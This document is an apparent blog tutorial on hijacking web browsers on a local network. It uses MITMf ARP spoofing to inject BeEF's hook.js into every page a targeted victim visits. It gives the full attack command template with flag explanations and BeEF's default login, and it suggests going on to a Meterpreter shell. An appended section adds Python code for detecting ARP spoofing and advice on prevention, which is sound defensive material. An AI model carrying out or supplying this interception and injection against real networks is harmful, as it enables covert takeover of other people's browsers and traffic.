Hook Web Browsers with MITMf and BeEF

Do you remember the last time we used BeEF? Well, now we get to use it again, but this time with MITMf! We are going to auto-inject the hooking script into every webpage the victim visits!

Requirements

If you don't already have it, install MITMf via apt-get install mitmf. You might want to apt-get update first. If you want to, you can clone it from the Git repository (git clone https://github.com/byt3bl33d3r/MITMf), but I've had trouble with that version.
BeEF should already be installed in Kali/Back|Track.

Step 1: Start BeEF

Open a new terminal and type cd /usr/share/beef-xss/.
As you can see, we have BeEF installed, and we can go ahead and run it by typing ./beef. You should get this output:
Do you see the Hook URL? That's important. Remember or copy the URL provided.

Step 2: Open the Panel

Now you can open the BeEF web panel with the UI URL. Once presented with the login page, you should just be able to get in with the default credentials "beef" for both the username and password. Once inside the UI, you should have this screen:

Step 3: Inject the Hook.js Script

Open up a new terminal. We'll be using MITMf to inject the hooking script. The command format is:

mitmf --spoof --arp -i <interface> --gateway <router IP> --target <target IP> --inject --js-url <hook.js URL>

  • --spoof loads the spoof plugin
  • --arp redirects traffic using ARP spoofing
  • -i specifies the network interface to use
  • --gateway sets the IP of your router to redirect through
  • --target sets the target IP to inject the hook.js script
  • --inject loads the inject plugin
  • --js-url specifies the URL of the JavaScript to inject
For instance, I use this command:
Run the command and MITMf should start giving you some output.
MITMf is telling us that it has successfully injected the hook.js script into the websites that the target visited.

Step 4: Back to BeEF

If we check our BeEF panel, we will see the hooked computer on the Online Browsers tab.
Remember in my previous XSS posts where I said the victim must stay on the webpage for you to have control of it? Guess what? You don't have to worry about that now! MITMf will continue injecting the script into every website the victim visits, so you'll never lose control!

Conclusion

Now we know what power lies within MITMf... we can do so much more. From there, you can continue trying to exploit the victim machine, and maybe get a Meterpreter prompt! Ah, the joy of MitM attacks...
NOTE: This only works with non-HSTS websites. You could try the --hsts function, but it might make things too slow and/or glitchy.
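
The ARP redirection used in Step 3 is visible from the target's side: the gateway's IP resolves to a different MAC than usual, and that MAC often also appears against a second IP on the LAN. The following is an added example, not part of the original post, that checks ip neigh show output for both signs; the sample table, the addresses and the pinned gateway MAC are all constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample: `ip neigh show` on a host whose gateway entry was poisoned.
SAMPLE_NEIGH = """\
192.168.1.1 dev eth0 lladdr 08:00:27:aa:bb:cc REACHABLE
192.168.1.50 dev eth0 lladdr 08:00:27:aa:bb:cc STALE
192.168.1.20 dev eth0 lladdr 3c:52:82:11:22:33 REACHABLE
192.168.1.30 dev eth0  FAILED
"""

NEIGH_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+dev\s+\S+\s+lladdr\s+"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\b",
    re.IGNORECASE,
)

def parse_neigh(text):
    """Return {ip: mac} for IPv4 entries with a resolved link-layer address."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:  # FAILED/INCOMPLETE entries carry no lladdr and are skipped
            table[m.group("ip")] = m.group("mac").lower()
    return table

def arp_spoof_findings(text, gateway_ip, pinned_gateway_mac=None):
    """Return a list of finding tuples; an empty list means nothing suspicious."""
    table = parse_neigh(text)
    gw_mac = table.get(gateway_ip)
    if gw_mac is None:
        return [("gateway_unresolved", gateway_ip)]
    findings = []
    # Check 1: gateway MAC differs from the value recorded on a trusted network.
    if pinned_gateway_mac and gw_mac != pinned_gateway_mac.lower():
        findings.append(("gateway_mac_mismatch", gw_mac))
    # Check 2: another IP shares the gateway's MAC. This can be benign (proxy ARP,
    # a router with several addresses), so treat it as a lead, not proof.
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    others = tuple(sorted(ip for ip in by_mac[gw_mac] if ip != gateway_ip))
    if others:
        findings.append(("gateway_mac_shared", gw_mac, others))
    return findings

if __name__ == "__main__":
    for finding in arp_spoof_findings(SAMPLE_NEIGH, "192.168.1.1", "00:11:22:33:44:55"):
        print(finding)
```

Pinning the gateway MAC only helps if it was recorded while the network was known to be clean; a static ARP entry for the gateway or dynamic ARP inspection on the switch prevents the redirection rather than just reporting it.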